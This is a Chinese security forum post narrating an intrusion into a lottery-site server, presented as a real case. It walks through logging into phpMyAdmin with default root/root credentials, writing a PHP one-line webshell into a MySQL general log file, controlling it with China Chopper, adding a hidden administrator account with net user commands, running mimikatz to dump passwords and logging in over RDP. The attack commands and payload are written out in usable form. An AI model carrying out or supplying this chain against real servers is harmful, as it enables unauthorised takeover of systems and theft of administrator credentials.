安全矩阵

 找回密码
 立即注册
搜索
查看: 6767|回复: 0

记一次彩票网站的攻击案例!随意操纵服务器!

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2020-12-19 19:26:39 | 显示全部楼层 |阅读模式
原文链接:一次彩票网站的攻击案例!随意操纵服务器!

START

0x01获取phpmyadmin弱口令
通过信息收集到彩票站点的ip为xxx,探测扫描发现存在phpmyadmin,通过猜测,使用默认弱口令(root/root)登入到phpmyadmin当中。



0x02通过phpmyadmin后台sql查询写入webshell到日志文件
使用phpmyadmin的sql查询功能将一句话木马写入到日志文件当中,流程如下:

命令如下:
1、开启日志功能:set global general_log=on;
2、点击phpmyadmin变量查看日志文件名字:

这里的日志文件是test.php。

3、执行SQL命令写入一句话到日志文件:


  1. SELECT'<?php assert($_POST["test"]);?>';
复制代码




4、 执行成功返回。

5、 查看日志文件。


0x03菜刀连接添加用户并且上传mimikatz
使用菜刀连接日志文件木马,xxx/test.php 密码:test


查看发现是系统管理员sysytem权限,直接添加用户且添加到管理组即可。

命令为:


  1. C:\Windows\system32\net.exe user Test Test!@#123 /add
  2. C:\Windows\system32\net.exe  localgroup administrators Test /add
复制代码

上传mimikataz到服务器当中。



0x043389连接,读取管理员密码
1、直接telnet ip 3389 测试发现可通,于是直接连接3389进去。

2、或者这里在菜刀上执行以下命令查询3389开放的端口也一样。
第一步: tasklist /svc | findstr TermService 查询远程桌面服务的进程
第二步: netstat -ano | findstr ****  //查看远程桌面服务进程号对应的端口号。

3、执行mimikatz,读取到管理员组登录密码。


4、 使用获取的administrator/xxxx账户密码远程登入服务器当中。


5、发现该服务器使用phpmystudy批量建立彩票站,大概有十几个站点,随意访问几个服务器上的网站域名,部分截图如下:
系统一:


版权申明:内容来源网络,版权归原创者所有。除非无法确认,都会标明作者及出处,如有侵权烦请告知,我们会立即删除并表示歉意。祝愿每一位读者生活愉快!谢谢!






















回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 13:36 , Processed in 0.013172 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表